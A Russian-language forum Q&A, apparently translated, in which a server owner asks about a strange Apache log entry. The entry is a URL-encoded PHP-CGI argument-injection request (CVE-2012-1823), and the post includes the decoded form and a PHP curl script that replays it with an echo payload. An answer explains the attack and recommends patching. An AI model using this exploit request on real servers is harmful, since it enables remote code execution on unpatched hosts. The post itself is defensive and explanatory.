Предупреждение: следующие запросы могут нанести вред вашему серверу.
У меня в журнале apache есть странные вещи:
"POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 200 276 "-" "-"
Это означает:
POST /phppath/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -n
Как видите, это дает 200, но когда я запускаю его с помощью curl:
<?php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://aussehenwie.de/%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, "<?php echo 'hacked'; ");
echo curl_exec($ch);
curl_close($ch);
?>
Он возвращает 404. То же самое, когда я запускаю его с терминала.
Почему это так? И что делает этот неуклюжий URL?
Это известно как одна из атак CGI, эффективная, когда кто-то использует непропатченный или неправильно настроенный веб-сервер.
Пример уязвимости: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1823
Он переопределяет настройки php.ini, установленные на сервере, и выполняет файл из input / URL.
Если вы обновляете свое программное обеспечение вовремя или не используете интерфейс CGI на своем веб-сервере (в случае apache - mod_cgi mod_fastcgi mod_fcgid и т. Д., Т.е. не mod_php) для взаимодействия с PHP - беспокоиться не о чем. Такие постоянные атаки / сканирования имеют постоянное поведение.